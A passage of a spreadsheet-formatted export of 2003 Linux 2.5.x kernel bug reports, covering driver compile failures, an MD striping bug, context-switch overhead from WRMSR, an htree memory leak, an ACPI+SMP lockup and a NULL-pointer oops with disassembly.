    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.cpqfcTSinit.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=cpqfcTSinit -DKBUILD_MODNAME=cpqfc -c -o drivers/scsi/cpqfcTSinit.o drivers/scsi/cpqfcTSinit.c drivers/scsi/cpqfcTSinit.c: In function `cpqfcTS_proc_info': drivers/scsi/cpqfcTSinit.c:968: structure has no member named `channel' drivers/scsi/cpqfcTSinit.c:970: structure has no member named `target' drivers/scsi/cpqfcTSinit.c: In function `cpqfcTS_TargetDeviceReset': drivers/scsi/cpqfcTSinit.c:1615: warning: implicit declaration of function `scsi_do_cmd' make[2]: *** [drivers/scsi/cpqfcTSinit.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; Compaq Fibre Channel 64-bit/66Mhz HBA support CONFIG_SCSI_CPQFCTS=y</t>
  </si>
  <si>
    <t>compile failure in drivers/scsi/sim710.c</t>
  </si>
  <si>
    <t>2003-02-11 12:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/scsi/.sim710.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=sim710 -DKBUILD_MODNAME=sim710 -c -o drivers/scsi/sim710.o drivers/scsi/sim710.c drivers/scsi/sim710.c:329: `sim710_device_remove' undeclared here (not in a function) drivers/scsi/sim710.c:329: initializer element is not constant drivers/scsi/sim710.c:329: (near initialization for `sim710_eisa_driver.driver.remove') drivers/scsi/sim710.c:330: initializer element is not constant drivers/scsi/sim710.c:330: (near initialization for `sim710_eisa_driver.driver') make[2]: *** [drivers/scsi/sim710.o] Error 1 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: SCSI device support ---&gt; SCSI low-level drivers ---&gt; &lt;*&gt; Simple 53c710 SCSI support (Compaq, NCR machines) CONFIG_SCSI_SIM710=y</t>
  </si>
  <si>
    <t>2.5.60 broke compile of aha152x</t>
  </si>
  <si>
    <t>2003-02-11 14:14 UTC</t>
  </si>
  <si>
    <t>2005-07-05 11:57 UTC</t>
  </si>
  <si>
    <t>stripped MD0 splits requests incorrectly</t>
  </si>
  <si>
    <t>See 2.5.4x upto 2.5.60</t>
  </si>
  <si>
    <t>2003-02-11 16:56 UTC</t>
  </si>
  <si>
    <t>Andi Kleen</t>
  </si>
  <si>
    <t>2003-05-27 02:41 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.1 Hardware Environment: Two disk RAID on adaptec SCSI Software Environment: XFS on MD0 (stripped) on two SCSI disks Problem Description: When trying to mount an XF S system on such a RAID system and XFS replays its log its hits BIO_BUG_ON(!bio-&gt;bi_io_vec) in ll_rw_block:submit_bio. According to axboe the problem is that MD splits requests incorrectly. It needs to ensure that when splitting requests between each resulting subrequest is at least one page long. 0 length BIOs as generated here are illegal. Fixing requires extended surgery in the MD request splitting. Steps to reproduce:</t>
  </si>
  <si>
    <t>i386 context switch very slow compared to 2.4 due to wrmsr (performance)</t>
  </si>
  <si>
    <t>Process Management</t>
  </si>
  <si>
    <t>Scheduler</t>
  </si>
  <si>
    <t>2.5.5x</t>
  </si>
  <si>
    <t>2003-02-11 17:06 UTC</t>
  </si>
  <si>
    <t>2003-10-06 21:08 UTC</t>
  </si>
  <si>
    <t>Robert Love</t>
  </si>
  <si>
    <t>Distribution: any Hardware Environment: especially Intel P4 Software Environment: Problem Description: Since the SYSENTER/vsyscall support went in the 2.5 __switch_to/load_esp0 function does two WRMSRs to rewrite MSR_IA32_SYSENTER_CS and MSR_IA32_SYSENTER_ESP. This is hidden in processor.h:load_esp0. WRMSR is very slow (60+ cycles) especially on a Pentium 4 and slows down the context switch considerably. This is a trade off between faster system calls using SYSENTER and slower context switches, but the context switches got unduly hit here. The reason it rewrites SYSENTER_CS is non obviously vm86 which doesn't guarantee the MSR stays constant (sigh). I think this would be better handled by having a global flag or process flag when any process uses vm86 and not do it when this flag is not set (as in 99% of all normal use cases) It rewrites SYSENTER_ESP to the stack page of the current process. Previous implements used an trampoline for that. The reason it was moved to the context was that an NMI could see the trampoline stack for one instruction and when it calls current (very unlikely) and references the stack pointer it doesn't get a valid task_struct. The obvious solution would be to somehow check this case (e.g. by looking at esp) in the NMI slow path. Steps to reproduce: Benchmark __switch_to or context switch. Note lmbench is not reliable (numbers vary wildy); microbenchmarks of WRMSR show the problem clearly.</t>
  </si>
  <si>
    <t>duplicated messages in tg3 startup</t>
  </si>
  <si>
    <t>2003-02-13 06:48 UTC</t>
  </si>
  <si>
    <t>2003-09-19 08:23 UTC</t>
  </si>
  <si>
    <t>2.5.60's tg3 driver seems overly verbose at startup.. tg3.c:v1.4 (Feb 1, 2003) eth0: Tigon3 [partno(3C996B-T) rev 0105 PHY(5701)] (PCI:33MHz:32-bit) 10/100/1000BaseT Ethernet 00:04:76:eb:b5:a0 tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX.</t>
  </si>
  <si>
    <t>Unneccessary includes of linux/version.h</t>
  </si>
  <si>
    <t>2.5.60-bk3</t>
  </si>
  <si>
    <t>2003-02-13 11:36 UTC</t>
  </si>
  <si>
    <t>2003-04-08 08:54 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 Software Environment: Problem Description: There appears to be a large number of kernel files (267) that #include &lt;linux/version.h&gt;, but do not use any of the three things defined in it. This causes these files to be needlessly(I think) recompiled during a kernel rebuild if only the version.h file changes. Would a patch to remove these extra includes be accepted? Here is the list (generated with a script, so it could be wrong..) /drivers/video/pm3fb.c /drivers/video/sstfb.c /drivers/net/tulip/de4x5.c /drivers/net/tulip/dmfe.c /drivers/net/wan/lmc/lmc_debug.c /drivers/net/wan/comx-proto-lapb.c /drivers/net/wan/comx-hw-comx.c /drivers/net/wan/sdla_ft1.c /drivers/net/wan/cycx_x25.c /drivers/net/wan/sdladrv.c /drivers/net/wan/dscc4.c /drivers/net/wan/comx-proto-fr.c /drivers/net/wan/comx.c /drivers/net/wan/comx-hw-locomx.c /drivers/net/wan/sdla_x25.c /drivers/net/wan/sdlamain.c /drivers/net/wan/pc300_drv.c /drivers/net/wan/comx-hw-mixcom.c /drivers/net/wan/sdla_fr.c /drivers/net/wan/comx-proto-ppp.c /drivers/net/tokenring/smctr.c /drivers/net/tokenring/tms380tr.c /drivers/net/hamradio/baycom_ser_hdx.c /drivers/net/hamradio/baycom_ser_fdx.c /drivers/net/hamradio/hdlcdrv.c /drivers/net/hamradio/yam.c /drivers/net/hamradio/baycom_par.c /drivers/net/sb1000.c /drivers/net/wireless/airo.c /drivers/net/aironet4500_proc.c /drivers/net/3c515.c /drivers/net/ibmlana.c /drivers/net/rrunner.c /drivers/net/ni65.c /drivers/net/mace.c /drivers/net/sis900.c /drivers/net/arlan-proc.c /drivers/net/aironet4500_card.c /drivers/net/strip.c /drivers/net/smc9194.c /drivers/net/cs89x0.c /drivers/net/ne2.c /drivers/acpi/toshiba_acpi.c /drivers/s390/cio/qdio.c /drivers/s390/char/tape_std.c /drivers/s390/char/sclp_tty.c /drivers/s390/char/tape_core.c /drivers/s390/char/tape_34xx.c /drivers/s390/char/tape_proc.c /drivers/s390/char/sclp_rw.c /drivers/s390/char/sclp_con.c /drivers/s390/char/sclp.c /drivers/s390/char/tape_block.c /drivers/s390/char/tape_char.c /drivers/s390/block/dasd_erp.c /drivers/s390/block/dasd_proc.c /drivers/s390/block/dasd.c /drivers/s390/block/dasd_devmap.c /drivers/s390/block/dasd_ioctl.c /drivers/s390/block/xpram.c /drivers/s390/block/dasd_genhd.c /drivers/s390/net/iucv.c /drivers/s390/net/lcs.c /drivers/s390/net/ctcmain.c /drivers/s390/net/fsm.c /drivers/s390/net/netiucv.c /drivers/media/radio/radio-gemtek-pci.c /drivers/media/video/bt856.c /drivers/media/video/cpia_pp.c /drivers/media/video/saa7185.c /drivers/media/video/bttv-if.c /drivers/media/video/videodev.c /drivers/media/video/saa7111.c /drivers/media/video/tuner-3036.c /drivers/media/video/c-qcam.c /drivers/media/video/bttv-risc.c /drivers/media/video/v4l1-compat.c /drivers/media/video/bttv-vbi.c /drivers/media/video/cpia.c /drivers/media/video/bttv-driver.c /drivers/media/video/pms.c /drivers/media/video/stradis.c /drivers/media/video/adv7175.c /drivers/media/video/v4l2-common.c /drivers/media/video/zr36067.c /drivers/media/video/zr36120_i2c.c /drivers/media/dvb/dvb-core/dvb_demux.c /drivers/media/dvb/dvb-core/dvbdev.c /drivers/isdn/i4l/isdn_common.c /drivers/isdn/hisax/hisax_fcclassic.c /drivers/isdn/hisax/hisax_hfcpci.c /drivers/isdn/hisax/hisax_fcpcipnp.c /drivers/isdn/hisax/st5481_init.c /drivers/isdn/hysdn/hysdn_net.c /drivers/isdn/hysdn/hycapi.c /drivers/isdn/hysdn/hysdn_proclog.c /drivers/isdn/hysdn/hysdn_init.c /drivers/isdn/hysdn/hysdn_procconf.c /drivers/isdn/capi/capifs.c /drivers/isdn/divert/isdn_divert.c /drivers/isdn/divert/divert_init.c /drivers/isdn/divert/divert_procfs.c /drivers/serial/mcfserial.c /drivers/char/rio/rio_linux.c /drivers/char/ftape/lowlevel/fdc-io.c /drivers/char/mwave/3780i.c /drivers/char/mwave/smapi.c /drivers/char/vme_scc.c /drivers/char/isicom.c /drivers/char/synclinkmp.c /drivers/char/cyclades.c /drivers/char/i8k.c /drivers/char/n_hdlc.c /drivers/char/pcmcia/synclink_cs.c /drivers/char/synclink.c /drivers/char/sx.c /drivers/char/dtlk.c /drivers/char/serial167.c /drivers/char/dsp56k.c /drivers/char/istallion.c /drivers/char/mxser.c /drivers/char/rocket.c /drivers/char/stallion.c /drivers/char/vt.c /drivers/char/toshiba.c /drivers/char/moxa.c /drivers/char/amiserial.c /drivers/i2c/i2c-frodo.c /drivers/i2c/chips/lm75.c /drivers/i2c/chips/adm1021.c /drivers/i2c/i2c-elektor.c /drivers/i2c/busses/i2c-amd8111.c /drivers/i2c/busses/i2c-amd756.c /drivers/i2c/i2c-core.c /drivers/i2c/i2c-adap-ite.c /drivers/i2c/i2c-algo-bit.c /drivers/i2c/i2c-algo-ibm_ocp.c /drivers/i2c/i2c-dev.c /drivers/i2c/i2c-algo-pcf.c /drivers/i2c/i2c-elv.c /drivers/i2c/i2c-algo-ite.c /drivers/scsi/aic7xxx/aiclib.c /drivers/scsi/53c700.c /drivers/scsi/aha152x.c /drivers/scsi/lasi700.c /drivers/scsi/bvme6000.c /drivers/scsi/NCR_D700.c /drivers/scsi/sym53c416.c /drivers/scsi/i60uscsi.c /drivers/scsi/mvme147.c /drivers/scsi/u14-34f.c /drivers/scsi/amiga7xx.c /drivers/scsi/osst.c /drivers/scsi/BusLogic.c /drivers/scsi/eata.c /drivers/scsi/a2091.c /drivers/scsi/dmx3191d.c /drivers/scsi/zalon.c /drivers/scsi/wd33c93.c /drivers/scsi/a3000.c /drivers/scsi/mvme16x.c /drivers/scsi/gvp11.c /drivers/scsi/sgiwd93.c /drivers/scsi/wd7000.c /drivers/mtd/maps/sun_uflash.c /drivers/mtd/devices/lart.c /drivers/mtd/chips/sharp.c /drivers/mtd/chips/map_rom.c /drivers/usb/media/ov511.c /drivers/usb/media/stv680.c /drivers/usb/image/mdc800.c /drivers/usb/class/audio.c /drivers/usb/core/usb-debug.c /drivers/usb/core/buffer.c /drivers/usb/host/ohci-hcd.c /drivers/block/amiflop.c /drivers/block/DAC960.c /drivers/block/cciss.c /drivers/pcmcia/sa1100_generic.c /drivers/pnp/isapnp/proc.c /drivers/pnp/isapnp/core.c /drivers/pnp/isapnp/compat.c /drivers/atm/iphase.c /drivers/atm/fore200e.c /drivers/ieee1394/raw1394.c /drivers/cdrom/sbpcd.c /drivers/message/fusion/mptbase.c /drivers/sbus/char/bpp.c /drivers/sbus/char/display7seg.c /drivers/sbus/char/cpwatchdog.c /drivers/bluetooth/hci_h4.c /drivers/bluetooth/hci_ldisc.c /drivers/bluetooth/hci_bcsp.c /drivers/bluetooth/hci_usb.c /drivers/telephony/phonedev.c /arch/ppc/syslib/prom.c /arch/ppc/syslib/prom_init.c /arch/cris/drivers/usb-host.c /arch/mips/gt64120/momenco_ocelot/setup.c /arch/mips/gt64120/momenco_ocelot/pci.c /arch/mips/gt64120/common/pci.c /arch/ppc64/kernel/prom.c /arch/parisc/kernel/asm-offsets.c /arch/parisc/kernel/signal.c /arch/parisc/kernel/process.c /arch/s390x/kernel/debug.c /arch/s390/kernel/debug.c /fs/afs/cmservice.c /fs/afs/kafstimod.c /fs/afs/kafsasyncd.c /fs/cifs/file.c /fs/cifs/transport.c /fs/cifs/cifsfs.c /fs/nls/nls_base.c /fs/jffs2/super.c /fs/coda/coda_linux.c /fs/adfs/super.c /fs/adfs/dir_fplus.c /fs/adfs/inode.c /fs/adfs/map.c /fs/adfs/dir_f.c /fs/adfs/dir.c /fs/adfs/file.c /fs/udf/super.c /fs/befs/datastream.c /fs/lockd/svc.c /fs/devfs/base.c /fs/jffs/intrep.c /net/ipv4/netfilter/ip_conntrack_core.c /net/ipv4/netfilter/ip_nat_core.c /net/ipv4/netfilter/ip_nat_helper.c /net/ipv4/netfilter/ipt_ULOG.c /net/ipv4/netfilter/ip_nat_rule.c /net/ipv4/netfilter/ip_conntrack_standalone.c /net/ipv4/netfilter/ip_nat_standalone.c /net/ipv4/netfilter/ip_fw_compat_masq.c /net/sunrpc/sysctl.c /net/sunrpc/svcsock.c /net/sunrpc/rpc_pipe.c /net/sunrpc/xprt.c /net/sunrpc/timer.c /net/rxrpc/krxiod.c /net/rxrpc/krxtimod.c /net/rxrpc/krxsecd.c /net/sched/sch_htb.c /net/wanrouter/wanproc.c /net/wanrouter/wanmain.c /sound/oss/cs46xx.c /sound/oss/emu10k1/audio.c /sound/oss/emu10k1/passthrough.c /sound/oss/emu10k1/mixer.c /sound/oss/emu10k1/main.c /sound/oss/emu10k1/midi.c /sound/oss/cs4281/cs4281m.c /sound/oss/esssolo1.c /sound/oss/ac97_codec.c /sound/oss/ite8172.c /sound/oss/btaudio.c /sound/oss/sonicvibes.c /sound/oss/cmpci.c /sound/oss/msnd_pinnacle.c /sound/oss/nec_vrc5477.c /sound/oss/es1371.c /sound/oss/i810_audio.c /sound/oss/trident.c /sound/oss/maestro.c /sound/oss/es1370.c Steps to reproduce:</t>
  </si>
  <si>
    <t>mm</t>
  </si>
  <si>
    <t>htree appears to leak memory</t>
  </si>
  <si>
    <t>2.5.60-bk4</t>
  </si>
  <si>
    <t>2003-02-14 09:32 UTC</t>
  </si>
  <si>
    <t>2003-02-26 08:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: single x86 CPU, Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01), Maxtor 91728D8, ATA DISK drive, 256mb RAM Software Environment: Problem Description: In playing with ext3+htree, something is leaking memory on deletes (I think). razor:/giant# cat /proc/meminfo MemTotal: 255884 kB MemFree: 28416 kB Buffers: 3812 kB Cached: 6544 kB SwapCached: 0 kB Active: 21228 kB Inactive: 6520 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 255884 kB LowFree: 28416 kB SwapTotal: 0 kB SwapFree: 0 kB Dirty: 16 kB Writeback: 0 kB Mapped: 19668 kB Slab: 197068 kB Committed_AS: 95668 kB PageTables: 484 kB ReverseMaps: 6098 SysRq : Show Memory Mem-info: DMA per-cpu: cpu 0 hot: low 2, high 6, batch 1 cpu 0 cold: low 0, high 2, batch 1 Normal per-cpu: cpu 0 hot: low 30, high 90, batch 15 cpu 0 cold: low 0, high 30, batch 15 HighMem per-cpu: empty Free pages: 2040kB (0kB HighMem) Active:13749 inactive:0 dirty:0 writeback:0 free:510 DMA free:1148kB min:128kB low:256kB high:384kB active:11336kB inactive:0kB Normal free:892kB min:1020kB low:2040kB high:3060kB active:43660kB inactive:0kB HighMem free:0kB min:0kB low:0kB high:0kB active:0kB inactive:0kB DMA: 1*4kB 1*8kB 1*16kB 1*32kB 1*64kB 0*128kB 0*256kB 0*512kB 1*1024kB 0*2048kB 0*4096kB = 1148kB Normal: 1*4kB 1*8kB 1*16kB 1*32kB 1*64kB 0*128kB 1*256kB 1*512kB 0*1024kB 0*2048 kB 0*4096kB = 892kB HighMem: empty Swap cache: add 0, delete 0, find 0/0, race 0+0 Free swap: 0kB 65536 pages of RAM 0 pages of HIGHMEM 1581 reserved pages 518 pages shared 0 pages swap cached And the memory won't free if I try to use it... bwindle@razor:~/C$ ./alloc 50 Allocating 50 megs... malloc(52428800): Cannot allocate memory Steps to reproduce: I unmountd an existing ext3 partition, ran tune2fs -O dir_index on it, did an e2fsck -fD, then mounted it. Created a bunch of directories and files, and did a 'rm -rf *' on them.</t>
  </si>
  <si>
    <t>ext3 compile failure if #define EXT3FS_DEBUG</t>
  </si>
  <si>
    <t>2003-02-14 11:22 UTC</t>
  </si>
  <si>
    <t>2003-02-18 09:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 Software Environment: Linux razor 2.5.60bk4 #5 Fri Feb 14 11:17:29 EST 2003 i686 Pentium II (Klamath) GenuineIntel GNU/Linux Gnu C 2.95.4 Gnu make 3.79.1 util-linux 2.11n mount 2.11n e2fsprogs 1.30-WIP reiserfsprogs 3.6.3 Linux C Library 2.2.5 Dynamic linker (ldd) 2.2.5 Procps 100. Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.2 CONFIG_EXT3_FS=y # CONFIG_EXT3_FS_XATTR is not set CONFIG_JBD=y CONFIG_JBD_DEBUG=y CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_KALLSYMS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y Problem Description: If you change include/linux/ext3_fs.h to #define EXT3FS_DEBUG, then fs/ext3/balloc.c fails to compile. It compiles if EXT3FS_DEBUG is #undef. gcc -Wp,-MD,fs/ext3/.balloc.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe - mpreferred-stack-boundary=2 -march=i686 -Iinclude/asm-i386/mach-default - nostdinc -iwithprefix include -DKBUILD_BASENAME=balloc - DKBUILD_MODNAME=ext3 -c -o fs/ext3/balloc.o fs/ext3/balloc.c fs/ext3/balloc.c: In function `ext3_new_block': fs/ext3/balloc.c:506: `i' undeclared (first use in this function) fs/ext3/balloc.c:506: (Each undeclared identifier is reported only once fs/ext3/balloc.c:506: for each function it appears in.) fs/ext3/balloc.c: In function `ext3_count_free_blocks': fs/ext3/balloc.c:662: warning: long unsigned int format, unsigned int arg (arg 2) make[2]: *** [fs/ext3/balloc.o] Error 1 make[1]: *** [fs/ext3] Error 2 make: *** [fs] Error 2 Steps to reproduce: change include/linux/ext3_fs.h:33 from #undef EXT3FS_DEBUG to #define EXT3FS_DEBUG, then recompile.</t>
  </si>
  <si>
    <t>eth0: Too much work at interrupt, IntrStatus=0x0001 at network shutdown</t>
  </si>
  <si>
    <t>2.5.61</t>
  </si>
  <si>
    <t>2003-02-15 07:25 UTC</t>
  </si>
  <si>
    <t>2003-02-26 13:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Raw Hide (15.2.2003) Hardware Environment: http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL), F9 bios Problem Description: when the network is shut down I get pages of</t>
  </si>
  <si>
    <t>drivers/scsi/pcmcia/ah152x_stub.c fails to compile</t>
  </si>
  <si>
    <t>2.5.58 - 2.5.61 at least</t>
  </si>
  <si>
    <t>2003-02-15 10:32 UTC</t>
  </si>
  <si>
    <t>G. Chris Hofmann</t>
  </si>
  <si>
    <t>2003-02-21 05:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Athlon Software Environment: Problem Description: Compilation bombs with: drivers/scsi/pcmcia/aha152x_stub.c:354:2: warning: #warning This does not protect you. You need some real fix for your races. drivers/scsi/pcmcia/aha152x_stub.c: In function `aha152x_event': drivers/scsi/pcmcia/aha152x_stub.c:411: structure has no member named `host' drivers/scsi/pcmcia/aha152x_stub.c:412: warning: implicit declaration of function `aha152x_host_reset' make[3]: *** [drivers/scsi/pcmcia/aha152x_stub.o] Error 1 make[2]: *** [drivers/scsi/pcmcia] Error 2 make[1]: *** [drivers/scsi] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Compile with PCMCIA SCSI module aha152x enabled.</t>
  </si>
  <si>
    <t>ACPI &amp;&amp; SMP -&gt; hard lockup within 5 min.</t>
  </si>
  <si>
    <t>Power-Other</t>
  </si>
  <si>
    <t>2003-02-15 16:31 UTC</t>
  </si>
  <si>
    <t>Tim Schmielau</t>
  </si>
  <si>
    <t>2004-03-03 14:57 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 7.0 (modified to run kernel 2.4) Hardware Environment:dual P3-850 on Asus P2B-DS (Intel BX chipset), 128 Mb ECC RAM, 30 GB UDMA-33 HD , RTL8029-based Ethernet card Software Environment: Kernel 2.5.61, GCC 2.95.3, in-tree ACPI, no modules Problem Description: With both ACPI and SMP enabled the machine will lock up hard (no oops, no keyboard) within about approx. 5 minutes. Problem occurs with kernels 2.5.60 and 2.5.61, but not with 2.5.59. Problem does not occur if either ACPI or SMP is turned off. Steps to reproduce: Compile kernel with 'Symmetric multi-processing support' and 'ACPI support' both set to yes. Install, boot, wait. To (maybe) trigger the bug more likely build a new kernel. My box never survived a whole build with this configuration. .config excerpt: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_SWAP=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=15 # # Loadable module support # # CONFIG_MODULES is not set # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set CONFIG_MPENTIUMIII=y # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_TSC=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_PREFETCH=y # CONFIG_HUGETLB_PAGE is not set CONFIG_SMP=y # CONFIG_PREEMPT is not set CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_NR_CPUS=2 CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=y # CONFIG_X86_CPUID is not set # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # # CONFIG_PM is not set # # ACPI Support # CONFIG_ACPI=y # CONFIG_ACPI_HT_ONLY is not set CONFIG_ACPI_BOOT=y CONFIG_ACPI_AC=y CONFIG_ACPI_BATTERY=y CONFIG_ACPI_BUTTON=y CONFIG_ACPI_FAN=y CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_DEBUG=y CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # CONFIG_CPU_FREQ is not set</t>
  </si>
  <si>
    <t>oops in render_sigset_t with 2.5.61 running SDET</t>
  </si>
  <si>
    <t>2003-02-15 17:34 UTC</t>
  </si>
  <si>
    <t>2003-03-17 15:39 UTC</t>
  </si>
  <si>
    <t>SDET on 16-way NUMA-Q. Unable to handle kernel NULL pointer dereference at virtual address 00000014 printing eip: c0118b13 *pde = 2b146001 *pte = 00000000 Oops: 0000 CPU: 10 EIP: 0060:[&lt;c0118b13&gt;] Not tainted EFLAGS: 00010207 EIP is at render_sigset_t+0x17/0x7c eax: 00000010 ebx: ed2fe0a1 ecx: ed2fe099 edx: eddd3980 esi: 0000003c edi: 00000010 ebp: ec7d7eec esp: ec7d7ee0 ds: 007b es: 007b ss: 0068 Process ps (pid: 10544, threadinfo=ec7d6000 task=ed0a6700) Stack: ed2fe0a1 00000002 eddd3f3c ed2fe080 c016d893 00000010 ed2fe0a1 ed2fe099 c0233f78 eddd3f3c ed2fe088 ed2fe080 c0233f6f ec7ccbd0 eddd3980 eb5caee0 ed2fe000 00000000 00000006 00000000 ec7d7f48 eddd3f3c eddd3f24 ec7d7f50 Call Trace: [&lt;c016d893&gt;] proc_pid_status+0x2a3/0x358 [&lt;c01300f6&gt;] __get_free_pages+0x4e/0x54 [&lt;c016b517&gt;] proc_info_read+0x53/0x130 [&lt;c0145295&gt;] vfs_read+0xa5/0x128 [&lt;c0145522&gt;] sys_read+0x2a/0x3c [&lt;c0108b3f&gt;] syscall_call+0x7/0xb (gdb) disassemble render_sigset_t Dump of assembler code for function render_sigset_t: 0xc0118afc &lt;render_sigset_t&gt;: push %ebp 0xc0118afd &lt;render_sigset_t+1&gt;: mov %esp,%ebp 0xc0118aff &lt;render_sigset_t+3&gt;: push %edi 0xc0118b00 &lt;render_sigset_t+4&gt;: push %esi 0xc0118b01 &lt;render_sigset_t+5&gt;: push %ebx 0xc0118b02 &lt;render_sigset_t+6&gt;: mov 0x8(%ebp),%edi 0xc0118b05 &lt;render_sigset_t+9&gt;: mov 0xc(%ebp),%ebx 0xc0118b08 &lt;render_sigset_t+12&gt;: mov $0x40,%esi 0xc0118b0d &lt;render_sigset_t+17&gt;: lea 0x0(%esi),%esi 0xc0118b10 &lt;render_sigset_t+20&gt;: add $0xfffffffc,%esi 0xc0118b13 &lt;render_sigset_t+23&gt;: bt %esi,(%edi) 0xc0118b16 &lt;render_sigset_t+26&gt;: sbb %edx,%edx 0xc0118b18 &lt;render_sigset_t+28&gt;: mov $0x1,%eax 0xc0118b1d &lt;render_sigset_t+33&gt;: xor %ecx,%ecx 0xc0118b1f &lt;render_sigset_t+35&gt;: test %edx,%edx 0xc0118b21 &lt;render_sigset_t+37&gt;: cmovne %eax,%ecx 0xc0118b24 &lt;render_sigset_t+40&gt;: lea 0x1(%esi),%edx 0xc0118b27 &lt;render_sigset_t+43&gt;: bt %edx,(%edi) 0xc0118b2a &lt;render_sigset_t+46&gt;: sbb %edx,%edx 0xc0118b2c &lt;render_sigset_t+48&gt;: mov %ecx,%eax 0xc0118b2e &lt;render_sigset_t+50&gt;: or $0x2,%al 0xc0118b30 &lt;render_sigset_t+52&gt;: test %edx,%edx 0xc0118b32 &lt;render_sigset_t+54&gt;: cmovne %eax,%ecx 0xc0118b35 &lt;render_sigset_t+57&gt;: lea 0x2(%esi),%edx 0xc0118b38 &lt;render_sigset_t+60&gt;: bt %edx,(%edi) 0xc0118b3b &lt;render_sigset_t+63&gt;: sbb %edx,%edx 0xc0118b3d &lt;render_sigset_t+65&gt;: mov %ecx,%eax 0xc0118b3f &lt;render_sigset_t+67&gt;: or $0x4,%al 